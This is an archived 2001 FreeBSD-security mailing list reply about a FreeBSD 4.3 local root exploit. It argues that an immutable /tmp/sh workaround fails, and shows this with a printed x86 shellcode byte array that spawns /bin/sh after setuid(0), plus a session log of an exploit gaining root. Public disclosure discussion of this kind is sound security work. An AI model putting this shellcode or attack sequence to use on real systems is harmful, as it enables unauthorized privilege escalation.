Date: Thu, 12 Jul 2001 19:32:21 +0200 From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl> To: "jamie rishaw" <jamie@playboy.com>, "alexus" <ml@db.nexgen.com> Cc: "Gabriel Rocha" <grocha@geeksimplex.org>, <security@FreeBSD.ORG> Subject: Re: FreeBSD 4.3 local root Message-ID: <087701c10af8$9ed30040$2001a8c0@clitoris> References: <20010712120706.B1020@geeksimplex.org> <079e01c10aef$21fd1460$2001a8c0@clitoris> <001f01c10af7$9b42f120$97625c42@alexus> <20010712122743.C14782@playboy.com>
next in thread | previous in thread | raw e-mail | index | archive | help
> su
> cd /tmp
> touch sh
> chmod 000 sh
> chflags schg sh
Anyone could use shellcode which calls directly /bin/sh; your fix won't work
in this case...
unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
riget:venglin:~> ./dupa
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe4a
child=83578
Password:done
# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
# ls -la /tmp/sh
ls: /tmp/sh: No such file or directory
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?087701c10af8$9ed30040$2001a8c0>